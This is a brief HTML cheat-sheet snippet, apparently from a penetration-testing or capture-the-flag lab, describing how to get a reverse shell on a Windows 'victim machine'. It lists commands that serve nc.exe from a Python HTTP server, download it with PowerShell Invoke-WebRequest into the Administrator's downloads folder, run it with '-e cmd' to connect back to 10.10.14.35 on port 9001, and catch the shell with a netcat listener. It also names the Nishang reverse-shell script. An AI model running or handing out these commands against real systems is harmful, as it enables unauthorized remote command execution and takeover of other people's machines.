#Reverse Shell Used is Nishang Invoke-Powershell-TCP.ps1 <br/>
<br/>
<b>Download and Execute Powershell Script on Victim Machine </b><br/>
- Method II <br/>
<br/>
powershell Invoke-WebRequest -Uri 10.10.14.35:8001/nc.exe -OutFile C:\Users\Administrator\downloads\nc.exe <br/>
<br/>
python -m SimpleHTTPServer 8001<br/>
<br/>
C:\users\administrator\downloads\nc.exe -e cmd 10.10.14.35 9001 <br/>
<br/>
nc -nvlp 9001</body></html>